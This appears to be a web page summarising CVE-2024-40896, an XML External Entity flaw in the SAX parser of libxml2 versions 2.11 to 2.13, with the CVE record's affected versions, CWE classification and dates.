libxml2: XML External Entity (XXE) in SAX Parser (CVE-2024-40896) #shorts

CVE

This CVE addresses a critical vulnerability in libxml2, specifically versions 2.11, 2.12, and 2.13 before the latest security updates. The issue lies within the SAX parser's handling of XML External Entities. Normally, custom SAX handlers can override the content of entities by setting 'checked,' but a flaw allows external entities to still produce events, causing the parser to remain vulnerable to classic XML External Entity attacks. This vulnerability allows attackers to potentially access sensitive data or perform unauthorized actions, posing a significant risk to applications using affected versions of libxml2.

Watch the full video on YouTube: CVE-2024-40896

Remediation and exploitation details

This chain involves the following actors

This following systems are involved

Attack entry point

Remediation actions

Exploitation actions

Related Content

NOTE: The following related content has not been vetted and may be unsafe.

CVE database technical details

CVE ID
CVE-2024-40896
Description
In libxml2 2.11 before 2.11.9, 2.12 before 2.12.9, and 2.13 before 2.13.3, the SAX parser can produce events for external entities even if custom SAX handlers try to override entity content (by setting "checked"). This makes classic XXE attacks possible.
Provider
mitre
CWE / problem types
CWE-611 Improper Restriction of XML External Entity Reference
Affected Software Versions
libxml2:libxml2:[{'lessThan': '2.11.9', 'status': 'affected', 'version': '2.11.0', 'versionType': 'semver'}, {'lessThan': '2.12.9', 'status': 'affected', 'version': '2.12.0', 'versionType': 'semver'}, {'lessThan': '2.13.3', 'status': 'affected', 'version': '2.13.0', 'versionType': 'semver'}]
Date Published
2024-12-23T00:00:00.000Z
Last Updated
2025-02-28T13:07:30.165Z